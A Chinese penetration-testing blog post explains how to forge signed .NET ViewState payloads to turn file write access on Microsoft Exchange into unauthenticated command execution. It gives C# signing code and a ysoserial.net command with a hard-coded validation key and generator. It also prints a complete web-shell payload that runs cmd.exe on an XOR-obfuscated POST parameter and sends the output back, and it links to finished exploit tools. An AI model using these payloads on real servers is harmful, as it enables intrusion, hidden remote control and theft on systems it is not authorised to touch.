在上篇文章《渗透技巧——从Exchange文件读写权限到命令执行》介绍了通过.Net反序列化ViewState从Exchange文件读写权限到命令执行的方法,分享了三种利用脚本的开发细节,本文将要具体分析生成ViewState的细节,介绍另外一种实现从Exchange文件读写权限到命令执行的脚本开发细节。
参考资料:
http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html
https://github.com/pwntester/ysoserial.net
0x01 简介
本文将要介绍以下内容:
·两种生成ViewState的实现方法
·另外一种利用脚本开发的细节
·开源代码
0x02 背景知识
1.DotNet反序列化ViewState的实现原理
如果能够读取web.config的文件内容,获得其中的加密密钥和算法,就能够构造出有效的序列化数据。如果将序列化数据设置成恶意委托,那么在ViewState使用ObjectStateFormatter进行反序列化调用委托时,就能实现远程代码执行。
2.ViewState的生成流程
使用validationkey和generator作为参数,对序列化xaml数据进行签名,并放在序列化xaml数据后,作Base64编码后组成最终的ViewStaten内容
直观理解:
data = Serialize(xaml)
ViewState = data + (data+generator).ComputeHash(validationKey)
ViewState = Base64(ViewState)
加密细节可参考:
https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs#L255
https://github.com/0xacb/viewgen/blob/master/viewgen#L156
具体细节可使用dnSpy反编译System.Web.dll,找到System.Web.Configuration.MachineKeySection的GetEncodedData函数
0x03 两种生成ViewState的实现方法
测试环境:
获得了Exchange文件读写权限,能够修改和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config,设置machineKey的内容如下:
对于这两个位置的.Net反序列化命令执行,不再需要合法用户的凭据
下面介绍两种生成ViewState的程序实现方法
1.从xaml数据生成ViewState
流程如下:
1. 构造xaml数据
2. 生成序列化xaml数据
3. 生成签名数据
4. 拼接序列化xaml数据和签名数据后作Base64编码
(1)构造xaml数据
这里介绍4种,分别对应4个功能
执行命令:
写文件:
注:需要注意xaml的转义字符。
设置Header:
设置Response:
(2)生成序列化xaml数据
需要用到Microsoft.PowerShell.Editor.dll
(3)生成签名数据
参考代码:
byte[] validationKey= strToToHexByte(key);
uint _clientstateid = 0;
// Converting "generator" from HEX to INT
if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid))
System.Environment.Exit(0);
byte[] _mackey = new byte[4];
_mackey[0] = (byte)_clientstateid;
_mackey[1] = (byte)(_clientstateid >> 8);
_mackey[2] = (byte)(_clientstateid >> 16);
_mackey[3] = (byte)(_clientstateid >> 24);
ms = new MemoryStream();
ms.Write(data,0,data.Length);
ms.Write(_mackey,0,_mackey.Length);
byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray());
注:代码修改自https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs#L253
(4)拼接序列化xaml数据和签名数据后作Base64编码
调用Convert.ToBase64String()即可。
完整的实现代码已上传至github,地址如下:
https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/XamlToViewState.cs
代码能够读取xaml文件,使用validationkey和generator计算签名,生成最终的ViewState。
优点:流程清晰,便于调试和修改细节。
缺点:需要依赖中间文件Microsoft.PowerShell.Editor.dll,占用空间。
注:
该方法的完整利用文件已打包上传至github,地址如下:
https://github.com/3gstudent/test/blob/master/XamlToViewState.zip
2.从序列化xaml数据生成ViewState
借助ysoserial.net跳过从xaml数据到序列化xaml数据的环节,提高开发效率。
流程如下:
(1)修改ysoserial.net源码,直接读取可用的序列化xaml数据
在https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs#L209添加如下代码:
Console.WriteLine(payloadString);
Console.WriteLine("The content above is what we need");
Console.WriteLine("-----------");
能够在控制台输出Base64编码的序列化xaml数据。
编译ysoserial.net,生成ysoserial.exe,在同级目录新建shellPayload.cs,内容如下:
class E
{
static string xor(string s) {
char[] a = s.ToCharArray();
for(int i = 0; i < a.Length; i++)
a[i] = (char)(a[i] ^ 'x');
return new string(a);
}
public E()
{
System.Web.HttpContext context = System.Web.HttpContext.Current;
context.Server.ClearError();
context.Response.Clear();
try
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "cmd.exe";
string cmd = context.Request.Form["__Value"];
cmd = xor(cmd);
process.StartInfo.Arguments = "/c " + cmd;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.UseShellExecute = false;
process.Start();
string output = process.StandardOutput.ReadToEnd();
output = xor(output);
context.Response.Write(output);
} catch (System.Exception) { }
context.Response.Flush();
context.Response.End();
}
}
使用ysoserial.exe生成ViewState,命令如下:
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "shellPayload.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="042A94E8"
从输出中获得Base64编码的序列化xaml数据。
(2)计算序列化xaml数据的签名,生成最终的ViewState数据
代码如下:
static string CreateViewState(byte[] dat,string generator,string key)
{
MemoryStream ms = new MemoryStream();
byte[] validationKey= strToHexByte(key);
uint _clientstateid = 0;
if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid))
{
System.Environment.Exit(0);
}
byte[] _mackey = new byte[4];
_mackey[0] = (byte)_clientstateid;
_mackey[1] = (byte)(_clientstateid >> 8);
_mackey[2] = (byte)(_clientstateid >> 16);
_mackey[3] = (byte)(_clientstateid >> 24);
ms = new MemoryStream();
ms.Write(dat,0,dat.Length);
ms.Write(_mackey,0,_mackey.Length);
byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray());
ms=new MemoryStream();
ms.Write(dat,0,dat.Length);
ms.Write(hash,0,hash.Length);
return Convert.ToBase64String(ms.ToArray());
完整的实现代码已上传至github,地址如下:
https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SerializeXamlToViewState.cs
代码实现了从序列化xaml数据计算签名,生成最终的ViewState数据。
优点:占用空间更小,可以直接使用ysoserial.net已有的Payload。
缺点:调试和修改比较麻烦。
注:以上两种实现方法的CreateViewState()函数在细节上存在区别,需要注意。
0x04 另外一种利用脚本开发的细节
用来实现从Exchange文件读写权限到命令执行。
参照https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs的结构,将序列化xaml数据封装在数组中,使用validationkey和generator作为参数,对序列化xaml数据进行签名,组成最终的ViewState内容。
完整的实现代码已上传至github,地址如下:
https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs
代码支持两个位置的反序列化执行,分别为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
代码首先发送ysoserial.net实现ActivitySurrogateDisableTypeCheck的数据,接着能够执行命令并获得命令执行的结果,通过POST方式以参数__Value发送数据,通信数据采用逐字符异或加密。
支持的功能同ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py保持一致。
0x05 小结
本文分析了生成ViewState的细节,介绍了两种生成ViewState的程序实现方法,编写代码实现了另外一种从Exchange文件读写权限到命令执行的利用脚本。
热门跟贴